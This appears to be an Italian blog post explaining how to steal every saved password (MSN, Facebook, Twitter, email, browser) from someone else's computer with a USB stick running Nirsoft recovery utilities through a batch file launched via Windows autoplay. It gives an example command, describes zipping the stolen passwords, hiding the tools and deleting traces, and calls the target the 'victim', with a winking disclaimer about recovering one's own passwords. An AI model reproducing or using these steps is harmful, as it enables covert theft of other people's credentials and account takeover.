lupen_pen_drive_rubare_password

Carissimi lettori oggi vorrei spiegarvi come Rubare le Password di un Computer con Lupen Pen Drive. Il metodo è veramente molto interessante e molto sbrigativo, infatti con un solo click riusciremo a salvare tutte le password memorizzate in quel computer sulla nostra chiavetta USB senza farci scoprire da nessuno.

Potrete quindi rubare tutte le password di MSN Messenger, le password di Facebook, di Twitter, quelle della posta elettronica, quelle memorizzate nei Browser e simili… per fare ciò vi basterà  scompattare la cartella Lupen-Pen-Drive.zip nella vostra chiavetta USB e lanciare il file eseguibile Lupen-Pen-Drive.bat.

Vi ricordo che Lupen Pen Drive sfrutta tutte le utility di Nirsoft.net e quindi  grazie ad esse in pochi secondi tutte le password del computer della vittima verranno copiate in file .html con lo stesso nome delle utilty utilizzate.

“Naturalmente questo articolo è stato creato solo per farvi salvare tutte le vostre password, in caso ve ne dimentichiate qualcuna” … 😉

Lupen_Pen_Drive

Quindi una volta che avrete sfruttato le utility, non dovrete fare altro che prendere e inserire tutti i file eseguibili in una cartella ( MI RACCOMANDO PERò, TUTTI I FILE DEVONO ESSERE SCOMPATTATI DIRETTAMENTE NELLA PENDRIVE, E NON DENTRO LA CARTELLA STESSA).

Poi in un’altro file eseguibile scrivere i comandi che consento di far eseguire tutte le utility della chiavetta e poi eseguire il comando che consente di copiare le password in un unico file comprezzo Lupen_Password.zip

A questo punto attraverso gli ultimi comandi nascondere le utility che abbiamo eseguito prima e cancellare i file HTML.

Lupen Pen Drive è un programma del tutto gratuito che deve essere programmato manualmente, inserendo i campi giusti per arrivare alla cartella da noi desiderata per permettergli di rubare quella determinata password.. ES: @mspass.exe /sverhtml mspass.html per rubare le password di Msn Messenger.

Se volete aggiungere o modificare un percorso per rubare una determinata password basta che modificate  “@mspass.exe /sverhtml mspass.html:” che significa –> “esegui mspass.exe” il quale come spiegato prima copia il risultato in un file mspass.html.

ATTENZIONE: In fondo ad ogni utility troverete i comandi supportati… controllate che supporti i parametri “/sverhtml” altrimenti il file .html non verrà creato e le password non verranno salvate.

Una volta che avrete deciso quali password rubare e avrete preparato i vostri eseguibili, inserite la chiavetta e quando l’auto play di windows vi mostrerà la seguente finestra, cliccate su  “Lupen-Pen-Drive” e cliccate su “OK“..

Lupe-Pen-Drive-2

E in pochi secondi  nella chiavetta come per magia vi ritroverete il file Lupen_Password.zip con tutte le password della vostra vittima.

Download Lupen Pen Drive

[Via|Chicche di Cala]

5 COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here

nove − quattro =